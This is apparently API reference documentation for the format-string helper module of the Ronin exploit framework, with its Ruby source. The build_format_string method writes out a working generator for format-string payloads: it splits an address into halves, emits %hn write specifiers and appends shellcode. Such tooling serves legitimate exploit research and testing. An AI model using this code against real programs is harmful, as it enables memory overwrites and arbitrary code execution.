Module: Ronin::Exploits::Helpers::FormatString

Defined in:

lib/ronin/exploits/helpers/format_string.rb

Overview

Adds methods to exploits for generating format strings to be used in format string vulnerabilities.

Target Parameters

The format string helper uses the following target parameters:

• overwrite
• pop_length
• address

Payloads

Uses the Payloads::Shellcode payload by default.

Instance Attribute Summary

• #format_string ⇒ Object

  The format string of the exploit.

Class Method Summary

• .extended(obj) ⇒ Object

Instance Method Summary

• #build_format_string ⇒ String protected

  Builds a format string using the current target and payload to be used in the format string exploit.

• #payload_class ⇒ Class

  Specifies that the exploit should use the Payloads::Shellcode class when searching for compatible payloads.

• #test_target! ⇒ true

  Tests the selected target and if it contains the overwrite, pop_length and address target parameters.

Instance Attribute Details

#format_string ⇒ Object

The format string of the exploit.

# File 'lib/ronin/exploits/helpers/format_string.rb', line 46

def format_string
  @format_string
end

Class Method Details

.extended(obj) ⇒ Object

# File 'lib/ronin/exploits/helpers/format_string.rb', line 48

def self.extended(obj)
  obj.instance_eval { helper :binary }
end

Instance Method Details

#build_format_string ⇒ String (protected)

Builds a format string using the current target and payload to be used in the format string exploit.

Returns:

• (String) —

  The built format string.

# File 'lib/ronin/exploits/helpers/format_string.rb', line 105

def build_format_string
  test_target!

  buffer = pack(target.overwrite) + 
           pack(target.overwrite + (target.arch.address_length / 2))

  low_mask = 0xff
  (target.arch.address_length/2).times do
    low_mask <<= 8
    low_mask |= 0xff
  end

  high_mask = low_mask << (target.arch.address_length*4)
  high = (target.address & high_mask) >> (target.arch.address_length/2)
  low = target.address & low_mask

  if low < high
    low -= (target.arch.address_length*2)
    buffer += format("%%.%ud%%%u$hn%%.%ud%%%u$hn",low,target.pop_length,high-low,target.pop_length+1)
  else
    high -= (target.arch.address_length*2)
    buffer += format("%%.%ud%%%u$hn%%.%ud%%%u$hn",high,target.pop_length+1,low-high,target.pop_length)
  end

  buffer << raw_payload
  return buffer
end

#payload_class ⇒ Class

Specifies that the exploit should use the Payloads::Shellcode class when searching for compatible payloads.

Returns:

• (Class) —

  Returns the Payloads::Shellcode class.

Since:

• 0.3.0

# File 'lib/ronin/exploits/helpers/format_string.rb', line 61

def payload_class
  Payload::Shellcode
end

#test_target! ⇒ true

Tests the selected target and if it contains the overwrite, pop_length and address target parameters.

Returns:

• (true) —

  The target is valid.

Raises:

• (TargetDataMissing) —

  The target is missing either the overwrite, pop_length or address target parameters.

Since:

• 1.0.0

# File 'lib/ronin/exploits/helpers/format_string.rb', line 78

def test_target!
  super

  unless target[:overwrite]
    raise(TargetDataMissing,"target missing the 'overwrite' param")
  end

  unless target[:pop_length]
    raise(TargetDataMissing,"target missing the 'pop_length' param")
  end

  unless target[:address]
    raise(TargetDataMissing,"target missing the 'address' param")
  end

  return true
end